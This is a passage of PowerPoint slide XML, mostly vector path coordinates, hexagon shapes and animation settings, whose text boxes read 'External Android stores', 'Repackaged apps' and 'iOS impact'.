                      <a:pt x="373" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="368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91" name="Hexagon 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3688069" y="2283083"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon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vert270" lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="TextBox 191"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3791701" y="2584534"/>
            <a:ext cx="1295400" cy="69249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bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>External Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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94" name="TextBox 193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4490201" y="3971538"/>
            <a:ext cx="1295400" cy="46166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bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Repackaged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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95" name="Hexagon 194"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3688069" y="4823083"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="TextBox 195"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3791701" y="5239950"/>
            <a:ext cx="1295400" cy="46166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500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>iOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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98" name="TextBox 197"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080501" y="4079295"/>
            <a:ext cx="129540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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Hexagon 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5090669" y="4823083"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha val="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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="TextBox 199"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394701" y="5347673"/>
            <a:ext cx="129540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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lat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1607394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7"/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3"/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3" grpId="0" animBg="1"/>
      <p:bldP spid="193" grpId="1" animBg="1"/>
      <p:bldP spid="197" grpId="0" animBg="1"/>
      <p:bldP spid="197" grpId="1" animBg="1"/>
      <p:bldP spid="191" grpId="0" animBg="1"/>
      <p:bldP spid="191" grpId="1" animBg="1"/>
      <p:bldP spid="192" grpId="0"/>
      <p:bldP spid="192" grpId="1"/>
      <p:bldP spid="194" grpId="0"/>
      <p:bldP spid="194" grpId="1"/>
      <p:bldP spid="195" grpId="0" animBg="1"/>
      <p:bldP spid="195" grpId="1" animBg="1"/>
      <p:bldP spid="196" grpId="0"/>
      <p:bldP spid="196" grpId="1"/>
      <p:bldP spid="198" grpId="0"/>
      <p:bldP spid="199" grpId="0" animBg="1"/>
      <p:bldP spid="199" grpId="1" animBg="1"/>
      <p:bldP spid="20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6625477" y="1430013"/>
            <a:ext cx="2525300" cy="2629525"/>
            <a:chOff x="6628652" y="1430013"/>
            <a:chExt cx="2525300" cy="2629525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="190" name="Freeform 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6953546" y="1430013"/>
              <a:ext cx="2200406" cy="2629525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3134 w 6195"/>
                <a:gd name="T1" fmla="*/ 3213 h 7403"/>
                <a:gd name="T2" fmla="*/ 3097 w 6195"/>
                <a:gd name="T3" fmla="*/ 3228 h 7403"/>
                <a:gd name="T4" fmla="*/ 3087 w 6195"/>
                <a:gd name="T5" fmla="*/ 3559 h 7403"/>
                <a:gd name="T6" fmla="*/ 3097 w 6195"/>
                <a:gd name="T7" fmla="*/ 3596 h 7403"/>
                <a:gd name="T8" fmla="*/ 3134 w 6195"/>
                <a:gd name="T9" fmla="*/ 3611 h 7403"/>
                <a:gd name="T10" fmla="*/ 3454 w 6195"/>
                <a:gd name="T11" fmla="*/ 3606 h 7403"/>
                <a:gd name="T12" fmla="*/ 3480 w 6195"/>
                <a:gd name="T13" fmla="*/ 3580 h 7403"/>
                <a:gd name="T14" fmla="*/ 3485 w 6195"/>
                <a:gd name="T15" fmla="*/ 3265 h 7403"/>
                <a:gd name="T16" fmla="*/ 3470 w 6195"/>
                <a:gd name="T17" fmla="*/ 3228 h 7403"/>
                <a:gd name="T18" fmla="*/ 4000 w 6195"/>
                <a:gd name="T19" fmla="*/ 0 h 7403"/>
                <a:gd name="T20" fmla="*/ 10 w 6195"/>
                <a:gd name="T21" fmla="*/ 278 h 7403"/>
                <a:gd name="T22" fmla="*/ 125 w 6195"/>
                <a:gd name="T23" fmla="*/ 1086 h 7403"/>
                <a:gd name="T24" fmla="*/ 330 w 6195"/>
                <a:gd name="T25" fmla="*/ 1858 h 7403"/>
                <a:gd name="T26" fmla="*/ 635 w 6195"/>
                <a:gd name="T27" fmla="*/ 2593 h 7403"/>
                <a:gd name="T28" fmla="*/ 1018 w 6195"/>
                <a:gd name="T29" fmla="*/ 3275 h 7403"/>
                <a:gd name="T30" fmla="*/ 1480 w 6195"/>
                <a:gd name="T31" fmla="*/ 3900 h 7403"/>
                <a:gd name="T32" fmla="*/ 2015 w 6195"/>
                <a:gd name="T33" fmla="*/ 4467 h 7403"/>
                <a:gd name="T34" fmla="*/ 2614 w 6195"/>
                <a:gd name="T35" fmla="*/ 4966 h 7403"/>
                <a:gd name="T36" fmla="*/ 3271 w 6195"/>
                <a:gd name="T37" fmla="*/ 5391 h 7403"/>
                <a:gd name="T38" fmla="*/ 3979 w 6195"/>
                <a:gd name="T39" fmla="*/ 5732 h 7403"/>
                <a:gd name="T40" fmla="*/ 4735 w 6195"/>
                <a:gd name="T41" fmla="*/ 5985 h 7403"/>
                <a:gd name="T42" fmla="*/ 6194 w 6195"/>
                <a:gd name="T43" fmla="*/ 7402 h 7403"/>
                <a:gd name="T44" fmla="*/ 6084 w 6195"/>
                <a:gd name="T45" fmla="*/ 2178 h 7403"/>
                <a:gd name="T46" fmla="*/ 5769 w 6195"/>
                <a:gd name="T47" fmla="*/ 2121 h 7403"/>
                <a:gd name="T48" fmla="*/ 5470 w 6195"/>
                <a:gd name="T49" fmla="*/ 2015 h 7403"/>
                <a:gd name="T50" fmla="*/ 5186 w 6195"/>
                <a:gd name="T51" fmla="*/ 1874 h 7403"/>
                <a:gd name="T52" fmla="*/ 4929 w 6195"/>
                <a:gd name="T53" fmla="*/ 1701 h 7403"/>
                <a:gd name="T54" fmla="*/ 4698 w 6195"/>
                <a:gd name="T55" fmla="*/ 1496 h 7403"/>
                <a:gd name="T56" fmla="*/ 4493 w 6195"/>
                <a:gd name="T57" fmla="*/ 1265 h 7403"/>
                <a:gd name="T58" fmla="*/ 4320 w 6195"/>
                <a:gd name="T59" fmla="*/ 1008 h 7403"/>
                <a:gd name="T60" fmla="*/ 4179 w 6195"/>
                <a:gd name="T61" fmla="*/ 724 h 7403"/>
                <a:gd name="T62" fmla="*/ 4073 w 6195"/>
                <a:gd name="T63" fmla="*/ 425 h 7403"/>
                <a:gd name="T64" fmla="*/ 4016 w 6195"/>
                <a:gd name="T65" fmla="*/ 110 h 7403"/>
                <a:gd name="T66" fmla="*/ 4657 w 6195"/>
                <a:gd name="T67" fmla="*/ 3916 h 7403"/>
                <a:gd name="T68" fmla="*/ 4583 w 6195"/>
                <a:gd name="T69" fmla="*/ 3984 h 7403"/>
                <a:gd name="T70" fmla="*/ 4483 w 6195"/>
                <a:gd name="T71" fmla="*/ 4011 h 7403"/>
                <a:gd name="T72" fmla="*/ 2058 w 6195"/>
                <a:gd name="T73" fmla="*/ 4011 h 7403"/>
                <a:gd name="T74" fmla="*/ 1984 w 6195"/>
                <a:gd name="T75" fmla="*/ 3984 h 7403"/>
                <a:gd name="T76" fmla="*/ 1942 w 6195"/>
                <a:gd name="T77" fmla="*/ 3953 h 7403"/>
                <a:gd name="T78" fmla="*/ 1916 w 6195"/>
                <a:gd name="T79" fmla="*/ 3916 h 7403"/>
                <a:gd name="T80" fmla="*/ 1884 w 6195"/>
                <a:gd name="T81" fmla="*/ 3816 h 7403"/>
                <a:gd name="T82" fmla="*/ 1900 w 6195"/>
                <a:gd name="T83" fmla="*/ 3743 h 7403"/>
                <a:gd name="T84" fmla="*/ 3107 w 6195"/>
                <a:gd name="T85" fmla="*/ 1517 h 7403"/>
                <a:gd name="T86" fmla="*/ 3160 w 6195"/>
                <a:gd name="T87" fmla="*/ 1454 h 7403"/>
                <a:gd name="T88" fmla="*/ 3207 w 6195"/>
                <a:gd name="T89" fmla="*/ 1427 h 7403"/>
                <a:gd name="T90" fmla="*/ 3286 w 6195"/>
                <a:gd name="T91" fmla="*/ 1412 h 7403"/>
                <a:gd name="T92" fmla="*/ 3338 w 6195"/>
                <a:gd name="T93" fmla="*/ 1417 h 7403"/>
                <a:gd name="T94" fmla="*/ 3386 w 6195"/>
                <a:gd name="T95" fmla="*/ 1438 h 7403"/>
                <a:gd name="T96" fmla="*/ 3459 w 6195"/>
                <a:gd name="T97" fmla="*/ 1517 h 7403"/>
                <a:gd name="T98" fmla="*/ 4672 w 6195"/>
                <a:gd name="T99" fmla="*/ 3743 h 7403"/>
                <a:gd name="T100" fmla="*/ 4687 w 6195"/>
                <a:gd name="T101" fmla="*/ 3816 h 7403"/>
                <a:gd name="T102" fmla="*/ 4657 w 6195"/>
                <a:gd name="T103" fmla="*/ 3916 h 7403"/>
                <a:gd name="T104" fmla="*/ 5995 w 6195"/>
                <a:gd name="T105" fmla="*/ 7202 h 7403"/>
                <a:gd name="T106" fmla="*/ 3496 w 6195"/>
                <a:gd name="T107" fmla="*/ 2231 h 7403"/>
                <a:gd name="T108" fmla="*/ 3113 w 6195"/>
                <a:gd name="T109" fmla="*/ 2210 h 7403"/>
                <a:gd name="T110" fmla="*/ 3076 w 6195"/>
                <a:gd name="T111" fmla="*/ 2231 h 7403"/>
                <a:gd name="T112" fmla="*/ 3060 w 6195"/>
                <a:gd name="T113" fmla="*/ 2262 h 7403"/>
                <a:gd name="T114" fmla="*/ 3092 w 6195"/>
                <a:gd name="T115" fmla="*/ 2992 h 7403"/>
                <a:gd name="T116" fmla="*/ 3118 w 6195"/>
                <a:gd name="T117" fmla="*/ 3008 h 7403"/>
                <a:gd name="T118" fmla="*/ 3428 w 6195"/>
                <a:gd name="T119" fmla="*/ 3013 h 7403"/>
                <a:gd name="T120" fmla="*/ 3465 w 6195"/>
                <a:gd name="T121" fmla="*/ 3003 h 7403"/>
                <a:gd name="T122" fmla="*/ 3512 w 6195"/>
                <a:gd name="T123" fmla="*/ 2257 h 7403"/>
                <a:gd name="T124" fmla="*/ 3496 w 6195"/>
                <a:gd name="T125" fmla="*/ 2231 h 7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195" h="7403">
                  <a:moveTo>
                    <a:pt x="3433" y="3213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="3606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454" y="3606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3213"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="400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0" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="1086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="1349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="1606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="1858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="2110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="2352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635" y="2593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750" y="2824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882" y="3050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018" y="3275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165" y="3491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="3900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827" y="4289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="4467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3271" y="5391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3501" y="5512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3979" y="5732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="5827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478" y="5911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4735" y="5985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4992" y="6047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4992" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6084" y="2178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5979" y="2162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5874" y="2141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5769" y="2121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5669" y="2089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="2052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5470" y="2015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5375" y="1974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281" y="1926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5186" y="1874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5098" y="1821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5013" y="1764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4929" y="1701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4851" y="1637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4772" y="1569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4698" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4625" y="1422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4557" y="1343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4493" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4430" y="1181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4373" y="1096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="1008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4179" y="724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4142" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4053" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4016" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4657" y="3916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4657" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4625" y="3953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4583" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4583" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536" y="4005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4509" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4483" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="4005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1963" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="3953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="3937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="3864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="3743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
